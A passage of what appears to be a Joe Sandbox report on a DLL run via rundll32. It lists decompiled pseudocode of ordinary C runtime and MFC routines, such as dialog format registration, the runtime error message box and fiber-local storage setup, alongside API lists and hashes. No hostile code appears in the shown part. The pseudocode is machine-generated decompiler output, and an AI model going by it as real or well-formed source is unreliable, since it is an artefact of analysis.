							__eflags = _t64 - 0xc000;
							if(_t64 >= 0xc000) {
								_push(_a4);
								_t69 = E10022115();
								_t33 = E100244DE(_t69, 0x10040f58);
								__eflags = _t33;
								if(_t33 == 0) {
									L14:
									__eflags = _t64 -  *0x1004f3ac; // 0x0
									if(__eflags != 0) {
										__eflags = _t64 -  *0x1004f3b0; // 0x0
										if(__eflags != 0) {
											__eflags = _t64 -  *0x1004f3a8; // 0x0
											if(__eflags != 0) {
												__eflags = _t64 -  *0x1004f3b4; // 0x0
												if(__eflags != 0) {
													goto L11;
												}
												_t31 =  *((intOrPtr*)( *_t69 + 0x158))();
												goto L23;
											}
											 *((intOrPtr*)( *_t69 + 0x160))(_a12, _a16 & 0x0000ffff, _a16 >> 0x10);
											goto L11;
										}
										_t19 = _t69 + 0x1c0; // 0x1c0
										_t65 = _t19;
										 *_t65 = _a16;
										_t31 =  *((intOrPtr*)( *_t69 + 0x15c))();
										 *_t65 =  *_t65 & 0x00000000;
										goto L23;
									}
									_t31 =  *((intOrPtr*)( *_t69 + 0x158))(_a16);
									goto L23;
								}
								_t40 = E1001CE89(_t69);
								__eflags =  *(_t40 + 0x36) & 0x00000008;
								if(( *(_t40 + 0x36) & 0x00000008) != 0) {
									goto L11;
								}
								goto L14;
							}
							L11:
							_t31 = 0;
							goto L23;
						}
						__eflags = _a12 - 0x40e;
						if(_a12 == 0x40e) {
							goto L22;
						}
						goto L10;
					} else {
						 *0x1004f3a8 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
						 *0x1004f3ac = RegisterClipboardFormatA("commdlg_ShareViolation");
						 *0x1004f3b0 = RegisterClipboardFormatA("commdlg_FileNameOK");
						 *0x1004f3b4 = RegisterClipboardFormatA("commdlg_ColorOK");
						 *0x1004f3b8 = RegisterClipboardFormatA("commdlg_help");
						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
						_push(_a16);
						 *0x1004f3bc = _t46;
						_push(_a12);
						_t31 = E1001EB68(_t53, _a4, 0x110);
						L23:
						return _t31;
					}
				}
				return 0;
			}












                                                                                                            0x1001d295
                                                                                                            0x1001d29f
                                                                                                            0x1001d2a4
                                                                                                            0x1001d2ae
                                                                                                            0x1001d2b0
                                                                                                            0x1001d2b3
                                                                                                            0x1001d2b5
                                                                                                            0x1001d2bd
                                                                                                            0x1001d2bf
                                                                                                            0x1001d2c4
                                                                                                            0x1001d2c7
                                                                                                            0x1001d2cc
                                                                                                            0x1001d2cc
                                                                                                            0x1001d2bf
                                                                                                            0x1001d2cf
                                                                                                            0x1001d2d8
                                                                                                            0x1001d2da
                                                                                                            0x1001d33e
                                                                                                            0x1001d349
                                                                                                            0x1001d40c
                                                                                                            0x1001d417
                                                                                                            0x1001d41f
                                                                                                            0x1001d41f
                                                                                                            0x00000000
                                                                                                            0x1001d41f
                                                                                                            0x1001d34f
                                                                                                            0x1001d351
                                                                                                            0x1001d35f
                                                                                                            0x1001d35f
                                                                                                            0x1001d365
                                                                                                            0x1001d36e
                                                                                                            0x1001d376
                                                                                                            0x1001d37f
                                                                                                            0x1001d384
                                                                                                            0x1001d386
                                                                                                            0x1001d395
                                                                                                            0x1001d395
                                                                                                            0x1001d39b
                                                                                                            0x1001d3ac
                                                                                                            0x1001d3b2
                                                                                                            0x1001d3ce
                                                                                                            0x1001d3d4
                                                                                                            0x1001d3f4
                                                                                                            0x1001d3fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d404
                                                                                                            0x00000000
                                                                                                            0x1001d404
                                                                                                            0x1001d3e9
                                                                                                            0x00000000
                                                                                                            0x1001d3e9
                                                                                                            0x1001d3b7
                                                                                                            0x1001d3b7
                                                                                                            0x1001d3bd
                                                                                                            0x1001d3c3
                                                                                                            0x1001d3c9
                                                                                                            0x00000000
                                                                                                            0x1001d3c9
                                                                                                            0x1001d3a4
                                                                                                            0x00000000
                                                                                                            0x1001d3a4
                                                                                                            0x1001d38a
                                                                                                            0x1001d38f
                                                                                                            0x1001d393
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d393
                                                                                                            0x1001d367
                                                                                                            0x1001d367
                                                                                                            0x00000000
                                                                                                            0x1001d367
                                                                                                            0x1001d353
                                                                                                            0x1001d359
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d2dc
                                                                                                            0x1001d2ee
                                                                                                            0x1001d2fa
                                                                                                            0x1001d306
                                                                                                            0x1001d312
                                                                                                            0x1001d31e
                                                                                                            0x1001d323
                                                                                                            0x1001d325
                                                                                                            0x1001d328
                                                                                                            0x1001d32d
                                                                                                            0x1001d334
                                                                                                            0x1001d420
                                                                                                            0x00000000
                                                                                                            0x1001d421
                                                                                                            0x1001d2da
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • RegisterClipboardFormatA.USER32(commdlg_LBSelChangedNotify), ref: 1001D2E7
                                                                                                            • RegisterClipboardFormatA.USER32(commdlg_ShareViolation), ref: 1001D2F3
                                                                                                            • RegisterClipboardFormatA.USER32(commdlg_FileNameOK), ref: 1001D2FF
                                                                                                            • RegisterClipboardFormatA.USER32(commdlg_ColorOK), ref: 1001D30B
                                                                                                            • RegisterClipboardFormatA.USER32(commdlg_help), ref: 1001D317
                                                                                                            • RegisterClipboardFormatA.USER32(commdlg_SetRGBColor), ref: 1001D323
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClipboardFormatRegister
                                                                                                            • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                                                                                            • API String ID: 1228543026-3888057576
                                                                                                            • Opcode ID: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
                                                                                                            • Instruction ID: 90b801e29acbd5a70dd584596d4e007027562c874008bfc0544b1ea411f40a0f
                                                                                                            • Opcode Fuzzy Hash: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
                                                                                                            • Instruction Fuzzy Hash: E7418071A00265EFDB21FF25CC889AE3BE1EB44391B12442AF905DB251DB30EA91CB95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10016994 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 115fileCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E10016994() {
				intOrPtr _t20;
				int _t21;
				long _t24;
				void* _t31;
				void* _t51;
				long _t52;
				void* _t57;
				signed int _t67;
				void** _t69;
				void* _t70;
				void* _t72;
				void* _t73;

				_t70 = _t72 - 0x8c;
				_t73 = _t72 - 0x10c;
				_t20 =  *0x1004c470; // 0x6edecb8c
				_t52 =  *(_t70 + 0x94);
				 *((intOrPtr*)(_t70 + 0x88)) = _t20;
				_t21 = 0;
				while(_t52 !=  *((intOrPtr*)(0x1004cb88 + _t21 * 8))) {
					_t21 = _t21 + 1;
					if(_t21 < 0x13) {
						continue;
					}
					break;
				}
				_t67 = _t21 << 3;
				_t6 = _t67 + 0x1004cb88; // 0x28000000
				if(_t52 ==  *_t6) {
					_t21 =  *0x1004f3d4; // 0x0
					if(_t21 == 1 || _t21 == 0 &&  *0x1004f3d8 == 1) {
						_t17 = _t67 + 0x1004cb8c; // 0x10042328
						_t69 = _t17;
						_t24 = E10011820( *_t69);
						_t21 = WriteFile(GetStdHandle(0xfffffff4),  *_t69, _t24, _t70 + 0x94, 0);
					} else {
						if(_t52 != 0xfc) {
							 *((char*)(_t70 + 0x84)) = 0;
							if(GetModuleFileNameA(0, _t70 - 0x80, 0x104) == 0) {
								E10017B90(_t70 - 0x80, "<program name unknown>");
							}
							_t63 = _t70 - 0x80;
							if(E10011820(_t70 - 0x80) + 1 > 0x3c) {
								E10019E20(E10011820(_t63) + _t70 - 0x45, "...", 3);
								_t73 = _t73 + 0x10;
							}
							_t31 = E10011820(_t63);
							_t12 = _t67 + 0x1004cb8c; // 0x10042328
							_t14 = E10011820( *_t12) + 0x1c; // 0x1c
							_pop(_t57);
							E10010B20(_t31 + _t14 + 0x00000003 & 0xfffffffc, _t57);
							_t51 = _t73;
							E10017B90(_t51, "Runtime Error!\n\nProgram: ");
							E10017BA0(_t51, _t63);
							E10017BA0(_t51, "\n\n");
							_t15 = _t67 + 0x1004cb8c; // 0x10042328
							E10017BA0(_t51,  *_t15);
							_push(0x12010);
							_push("Microsoft Visual C++ Runtime Library");
							_push(_t51);
							_t21 = E10019D1D();
						}
					}
				}
				return E100117AE(_t21,  *((intOrPtr*)(_t70 + 0x88)));
			}















                                                                                                            0x10016995
                                                                                                            0x1001699c
                                                                                                            0x100169a2
                                                                                                            0x100169a7
                                                                                                            0x100169af
                                                                                                            0x100169b8
                                                                                                            0x100169ba
                                                                                                            0x100169c3
                                                                                                            0x100169c7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100169c7
                                                                                                            0x100169cb
                                                                                                            0x100169ce
                                                                                                            0x100169d4
                                                                                                            0x100169da
                                                                                                            0x100169e2
                                                                                                            0x10016acf
                                                                                                            0x10016acf
                                                                                                            0x10016ad7
                                                                                                            0x10016ae9
                                                                                                            0x100169f9
                                                                                                            0x100169ff
                                                                                                            0x10016a0f
                                                                                                            0x10016a1d
                                                                                                            0x10016a28
                                                                                                            0x10016a2e
                                                                                                            0x10016a2f
                                                                                                            0x10016a3f
                                                                                                            0x10016a5b
                                                                                                            0x10016a60
                                                                                                            0x10016a60
                                                                                                            0x10016a64
                                                                                                            0x10016a69
                                                                                                            0x10016a76
                                                                                                            0x10016a7e
                                                                                                            0x10016a82
                                                                                                            0x10016a87
                                                                                                            0x10016a8f
                                                                                                            0x10016a96
                                                                                                            0x10016aa1
                                                                                                            0x10016aa6
                                                                                                            0x10016aad
                                                                                                            0x10016ab2
                                                                                                            0x10016ab7
                                                                                                            0x10016abc
                                                                                                            0x10016abd
                                                                                                            0x10016ac2
                                                                                                            0x100169ff
                                                                                                            0x100169e2
                                                                                                            0x10016b0a

                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 10016A15
                                                                                                            • _strlen.LIBCMT ref: 10016A35
                                                                                                            • _strlen.LIBCMT ref: 10016A44
                                                                                                            • _strncpy.LIBCMT ref: 10016A5B
                                                                                                            • _strlen.LIBCMT ref: 10016A64
                                                                                                            • _strlen.LIBCMT ref: 10016A71
                                                                                                            • _strlen.LIBCMT ref: 10016AD7
                                                                                                            • GetStdHandle.KERNEL32(000000F4,10042328,00000000,?,00000000,00000000,00000000,00000000), ref: 10016AE2
                                                                                                            • WriteFile.KERNEL32(00000000), ref: 10016AE9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _strlen$File$HandleModuleNameWrite_strncpy
                                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                            • API String ID: 190417973-4022980321
                                                                                                            • Opcode ID: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
                                                                                                            • Instruction ID: a98b9a16bc0a3033c6b9ef3d9cc886c10ccef6c9644ec2f046cd71b0d49ba214
                                                                                                            • Opcode Fuzzy Hash: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
                                                                                                            • Instruction Fuzzy Hash: 6331F4765002146BEB21EB74CCD6EAA37BDEF48250F10891AF545EB142EF34F9C98B64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10015384 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 71libraryloadermemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 70%
                                                                                                            			E10015384() {
				void* __edi;
				void* __esi;
				intOrPtr _t7;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t11;
				long _t12;
				_Unknown_base(*)()* _t16;
				void* _t22;
				struct HINSTANCE__* _t26;
				void* _t30;
				struct HINSTANCE__* _t32;

				if(E100138E5() != 0) {
					_push(_t30);
					_t26 = GetModuleHandleA("kernel32.dll");
					__eflags = _t26;
					if(_t26 != 0) {
						_t30 = GetProcAddress;
						 *0x1004f5dc = GetProcAddress(_t26, "FlsAlloc");
						 *0x1004f5e0 = GetProcAddress(_t26, "FlsGetValue");
						 *0x1004f5e4 = GetProcAddress(_t26, "FlsSetValue");
						_t16 = GetProcAddress(_t26, "FlsFree");
						__eflags =  *0x1004f5e0;
						 *0x1004f5e8 = _t16;
						if( *0x1004f5e0 == 0) {
							 *0x1004f5e0 = TlsGetValue;
							 *0x1004f5e4 = TlsSetValue;
							 *0x1004f5dc = 0x10015164;
							 *0x1004f5e8 = TlsFree;
						}
					}
					_t7 =  *0x1004f5dc(E1001520E);
					__eflags = _t7 - 0xffffffff;
					 *0x1004c848 = _t7;
					if(__eflags == 0) {
						L9:
						E1001516D();
						_t9 = 0;
						__eflags = 0;
					} else {
						_push(0x8c);
						_push(1);
						_t32 = E1001382A(_t22, 1, _t30, __eflags);
						__eflags = _t32;
						if(_t32 == 0) {
							goto L9;
						} else {
							_t11 =  *0x1004f5e4( *0x1004c848, _t32);
							__eflags = _t11;
							if(_t11 == 0) {
								goto L9;
							} else {
								 *((intOrPtr*)(_t32 + 0x54)) = 0x1004cb00;
								 *((intOrPtr*)(_t32 + 0x14)) = 1;
								_t12 = GetCurrentThreadId();
								 *(_t32 + 4) =  *(_t32 + 4) | 0xffffffff;
								 *_t32 = _t12;
								_t9 = 1;
							}
						}
					}
					return _t9;
				} else {
					E1001516D();
					return 0;
				}
			}














                                                                                                            0x1001538b
                                                                                                            0x10015395
                                                                                                            0x100153a2
                                                                                                            0x100153a4
                                                                                                            0x100153a6
                                                                                                            0x100153a8
                                                                                                            0x100153bc
                                                                                                            0x100153c9
                                                                                                            0x100153d6
                                                                                                            0x100153db
                                                                                                            0x100153dd
                                                                                                            0x100153e4
                                                                                                            0x100153e9
                                                                                                            0x100153f0
                                                                                                            0x100153fa
                                                                                                            0x10015404
                                                                                                            0x1001540e
                                                                                                            0x1001540e
                                                                                                            0x100153e9
                                                                                                            0x10015418
                                                                                                            0x1001541e
                                                                                                            0x10015421
                                                                                                            0x10015426
                                                                                                            0x10015469
                                                                                                            0x10015469
                                                                                                            0x1001546e
                                                                                                            0x1001546e
                                                                                                            0x10015428
                                                                                                            0x1001542a
                                                                                                            0x10015430
                                                                                                            0x10015436
                                                                                                            0x10015438
                                                                                                            0x1001543c
                                                                                                            0x00000000
                                                                                                            0x1001543e
                                                                                                            0x10015445
                                                                                                            0x1001544b
                                                                                                            0x1001544d
                                                                                                            0x00000000
                                                                                                            0x1001544f
                                                                                                            0x1001544f
                                                                                                            0x10015456
                                                                                                            0x10015459
                                                                                                            0x1001545f
                                                                                                            0x10015463
                                                                                                            0x10015465
                                                                                                            0x10015465
                                                                                                            0x1001544d
                                                                                                            0x1001543c
                                                                                                            0x10015472
                                                                                                            0x1001538d
                                                                                                            0x1001538d
                                                                                                            0x10015394
                                                                                                            0x10015394

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,10011225,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001539C
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 100153B4
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 100153C1
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 100153CE
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 100153DB
                                                                                                            • FlsAlloc.KERNEL32(Function_0001520E,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015418
                                                                                                            • FlsSetValue.KERNEL32(00000000,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015445
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 10015459
                                                                                                              • Part of subcall function 1001516D: FlsFree.KERNEL32(FFFFFFFF,100112B4,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015178
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue
                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
                                                                                                            • API String ID: 2355849793-282957996
                                                                                                            • Opcode ID: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
                                                                                                            • Instruction ID: 40006df79962a22775231557979cac449e3f6d5e877b76d204bcc213d6c27e9e
                                                                                                            • Opcode Fuzzy Hash: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
                                                                                                            • Instruction Fuzzy Hash: D821CF78901A65DFE321CF7A9D88A673FE0EB42692718412EF910CF260EB71C480CF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002D2D6 Relevance: 21.4, APIs: 14, Instructions: 397COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E1002D2D6(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v8;
				int _v12;
				int _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				int _v48;
				void* _v52;
				struct tagRECT _v68;
				struct tagRECT _v84;
				struct tagRECT _v100;
				struct HDWP__* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t188;
				signed int _t190;
				signed int _t192;
				intOrPtr* _t198;
				intOrPtr _t206;
				int _t208;
				signed int _t210;
				signed int _t211;
				signed int _t214;
				signed int _t215;
				signed int _t221;
				void* _t225;
				intOrPtr _t233;
				intOrPtr _t234;
				int _t243;
				signed int _t251;
				signed int _t256;
				long _t263;
				intOrPtr _t264;
				int _t273;
				signed int _t280;
				signed int _t287;
				intOrPtr* _t297;
				intOrPtr _t302;
				signed int _t310;
				signed int _t312;
				intOrPtr _t319;
				signed int _t325;
				intOrPtr _t326;
				signed int _t329;
				int _t334;
				intOrPtr* _t341;

				_t297 = __ecx;
				E1002F49A( &_v28, _a8, _a12);
				if(IsRectEmpty(_t297 + 0xac) != 0) {
					GetClientRect( *(E10022A96(_t297) + 0x1c),  &_v84);
					_t188 = _v84.right - _v84.left;
					_t302 = _v84.bottom - _v84.top;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *_t297 + 0x13c))( &_v68, _a12);
					_t188 = _v68.right - _v68.left;
					_t302 = _v68.bottom - _v68.top;
				}
				_t334 = 0;
				_v44 = _t188;
				_v40 = _t302;
				if( *((intOrPtr*)(_t297 + 0xa8)) == 0) {
					_v132 = BeginDeferWindowPos( *(_t297 + 0x9c));
				} else {
					_v132 = 0;
				}
				_t190 =  *0x1004efa0; // 0x2
				_v36 =  ~_t190;
				_t192 =  *0x1004efa4; // 0x2
				_v32 =  ~_t192;
				_v16 = _t334;
				_v12 = _t334;
				_v8 = _t334;
				if( *(_t297 + 0x9c) <= _t334) {
					L72:
					if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && _v132 != _t334) {
						EndDeferWindowPos(_v132);
					}
					SetRectEmpty( &_v100);
					 *((intOrPtr*)( *_t297 + 0x13c))( &_v100, _a12);
					if(_a8 == _t334 || _a12 == _t334) {
						if(_v28 != _t334) {
							_v28 = _v28 + _v100.left - _v100.right;
						}
					}
					if(_a8 == _t334 || _a12 != _t334) {
						if(_v24 != _t334) {
							_v24 = _v24 + _v100.top - _v100.bottom;
						}
					}
					_t198 = _a4;
					 *_t198 = _v28;
					 *((intOrPtr*)(_t198 + 4)) = _v24;
					return _t198;
				} else {
					do {
						_t341 = E1002CE0B(_t297, _v8);
						_v20 = _t341;
						_t206 =  *((intOrPtr*)(E100086F2(_t297 + 0x94, _v8)));
						if(_t341 == _t334) {
							if(_t206 != _t334) {
								goto L71;
							}
							L58:
							_t208 = _v16;
							if(_t208 != _t334) {
								if(_a12 == _t334) {
									_t310 = _v36 + _t208 -  *0x1004efa0;
									_v36 = _t310;
									if(_v28 <= _t310) {
										_v28 = _t310;
									}
									_t210 = _v32;
									if(_v24 <= _t210) {
										_v24 = _t210;
									}
									_t211 =  *0x1004efa4; // 0x2
									_v32 =  ~_t211;
								} else {
									_t312 = _v32 + _t208 -  *0x1004efa4;
									_t214 = _v36;
									_v32 = _t312;
									if(_v28 <= _t214) {
										_v28 = _t214;
									}
									if(_v24 <= _t312) {
										_v24 = _t312;
									}
									_t215 =  *0x1004efa0; // 0x2
									_v36 =  ~_t215;
								}
								_v16 = _t334;
							}
							goto L71;
						}
						if( *((intOrPtr*)( *_t341 + 0x150))() == 0) {
							L51:
							if(_v12 != _t334) {
								goto L71;
							}
							L52:
							 *((intOrPtr*)( *_t341 + 0x154))( &_v132);
							goto L71;
						}
						_t221 =  *(_t341 + 0x7c);
						if((_t221 & 0x00000004) == 0 || (_t221 & 0x00000001) == 0) {
							asm("sbb eax, eax");
							_t225 = ( ~(_t221 & 0x0000a000) & 0xfffffffa) + 0x10;
						} else {
							_t225 = 6;
						}
						 *((intOrPtr*)( *_t341 + 0x134))( &_v52, 0xffffffff, _t225);
						E100086B2( &_v68, _v36, _v32, _v52, _v48);
						GetWindowRect( *(_t341 + 0x1c),  &_v84);
						E10028E5A(_t297,  &_v84);
						if(_a12 == _t334) {
							_t233 = _v84.top;
							if(_t233 > _v68.top &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
								OffsetRect( &_v68, _t334, _t233 - _v68.top);
							}
							_t234 = _v68.bottom;
							_t319 = _v40;
							if(_t234 > _t319 &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
								_t325 = _t319 - _t234 - _v68.top -  *0x1004efa4;
								_t256 = _v32;
								if(_t325 > _t256) {
									_t256 = _t325;
								}
								OffsetRect( &_v68, _t334, _t256 - _v68.top);
							}
							if(_v12 == _t334) {
								if(_v68.top < _v40 -  *0x1004efa4) {
									goto L44;
								}
								_t247 = _v8;
								if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t247 - 1))) == _t334) {
									goto L44;
								} else {
									goto L56;
								}
							} else {
								_t251 =  *0x1004efa4; // 0x2
								_v12 = _t334;
								OffsetRect( &_v68, _t334,  ~(_v68.top + _t251));
								L44:
								if(EqualRect( &_v68,  &_v84) == 0) {
									if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t341 = _v20;
										_t334 = 0;
									}
									E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
								}
								_v32 = _v68.top -  *0x1004efa4 + _v48;
								_t243 = _v52;
								if(_v16 > _t243) {
									goto L52;
								} else {
									_v16 = _t243;
									goto L51;
								}
							}
						} else {
							_t263 = _v84.left;
							if(_t263 > _v68.left &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
								OffsetRect( &_v68, _t263 - _v68.left, _t334);
							}
							_t264 = _v68.right;
							_t326 = _v44;
							if(_t264 <= _t326 ||  *((intOrPtr*)(_t297 + 0x90)) != _t334) {
								L22:
								if(_v12 == _t334) {
									if(_v68.left < _v44 -  *0x1004efa0) {
										L27:
										if(EqualRect( &_v68,  &_v84) == 0) {
											if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t341 = _v20;
												_t334 = 0;
											}
											E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
										}
										_v36 = _v52 -  *0x1004efa0 + _v68.left;
										_t273 = _v48;
										if(_v16 <= _t273) {
											_v16 = _t273;
										}
										goto L52;
									}
									_t277 = _v8;
									if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t277 - 1))) == _t334) {
										goto L27;
									} else {
										L56:
										E1001E2F0(_t297, _t297 + 0x94, _t334, 1, _v8, _t334, 1);
										_v12 = 1;
										goto L58;
									}
								}
								_t280 =  *0x1004efa0; // 0x2
								_v12 = _t334;
								OffsetRect( &_v68,  ~(_t280 + _v68.left), _t334);
								goto L27;
							} else {
								_t329 = _t326 - _t264 -  *0x1004efa0 - _v68.left;
								_t287 = _v36;
								if(_t329 > _t287) {
									_t287 = _t329;
								}
								OffsetRect( &_v68, _t287 - _v68.left, _t334);
								goto L22;
							}
						}
						L71:
						_v8 = _v8 + 1;
					} while (_v8 <  *(_t297 + 0x9c));
					goto L72;
				}
			}























































                                                                                                            0x1002d2eb
                                                                                                            0x1002d2ee
                                                                                                            0x1002d302
                                                                                                            0x1002d338
                                                                                                            0x1002d344
                                                                                                            0x1002d347
                                                                                                            0x1002d304
                                                                                                            0x1002d30c
                                                                                                            0x1002d30d
                                                                                                            0x1002d30e
                                                                                                            0x1002d315
                                                                                                            0x1002d316
                                                                                                            0x1002d322
                                                                                                            0x1002d325
                                                                                                            0x1002d325
                                                                                                            0x1002d34a
                                                                                                            0x1002d352
                                                                                                            0x1002d355
                                                                                                            0x1002d358
                                                                                                            0x1002d36b
                                                                                                            0x1002d35a
                                                                                                            0x1002d35a
                                                                                                            0x1002d35a
                                                                                                            0x1002d36e
                                                                                                            0x1002d375
                                                                                                            0x1002d378
                                                                                                            0x1002d385
                                                                                                            0x1002d388
                                                                                                            0x1002d38b
                                                                                                            0x1002d38e
                                                                                                            0x1002d391
                                                                                                            0x1002d6fd
                                                                                                            0x1002d703
                                                                                                            0x1002d70d
                                                                                                            0x1002d70d
                                                                                                            0x1002d717
                                                                                                            0x1002d728
                                                                                                            0x1002d731
                                                                                                            0x1002d73b
                                                                                                            0x1002d743
                                                                                                            0x1002d743
                                                                                                            0x1002d73b
                                                                                                            0x1002d749
                                                                                                            0x1002d753
                                                                                                            0x1002d75b
                                                                                                            0x1002d75b
                                                                                                            0x1002d753
                                                                                                            0x1002d75e
                                                                                                            0x1002d765
                                                                                                            0x1002d76b
                                                                                                            0x1002d770
                                                                                                            0x1002d397
                                                                                                            0x1002d397
                                                                                                            0x1002d3a4
                                                                                                            0x1002d3ac
                                                                                                            0x1002d3b6
                                                                                                            0x1002d3b8
                                                                                                            0x1002d682
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002d684
                                                                                                            0x1002d684
                                                                                                            0x1002d689
                                                                                                            0x1002d68e
                                                                                                            0x1002d6c6
                                                                                                            0x1002d6cb
                                                                                                            0x1002d6ce
                                                                                                            0x1002d6d0
                                                                                                            0x1002d6d0
                                                                                                            0x1002d6d3
                                                                                                            0x1002d6d9
                                                                                                            0x1002d6db
                                                                                                            0x1002d6db
                                                                                                            0x1002d6de
                                                                                                            0x1002d6e5
                                                                                                            0x1002d690
                                                                                                            0x1002d699
                                                                                                            0x1002d69b
